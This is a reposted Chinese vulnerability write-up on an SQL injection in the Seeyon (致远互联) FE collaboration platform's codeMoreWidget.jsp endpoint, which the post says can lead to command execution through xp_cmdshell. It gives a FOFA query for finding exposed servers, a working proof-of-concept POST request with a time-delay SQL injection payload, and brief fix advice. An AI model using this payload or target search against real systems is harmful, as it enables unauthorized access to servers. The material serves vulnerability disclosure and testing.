当前位置: 首页> 文旅> 文化 > 致远互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现

致远互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现

时间:2025/7/10 7:28:36来源:https://blog.csdn.net/qq_41904294/article/details/140059992 浏览次数:0次

0x01 产品简介

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。

0x02 漏洞概述

致远互联FE协作办公平台 codeMoreWidget.jsp接口处存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。

0x03 复现环境

FOFA:body="li_plugins_download"

0x04 漏洞复现

PoC

POST /common/codeMoreWidget.js%70 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closecode=1';WAITFOR DELAY '0:0:5'--

延时5秒

RCE

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

关键字:致远互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: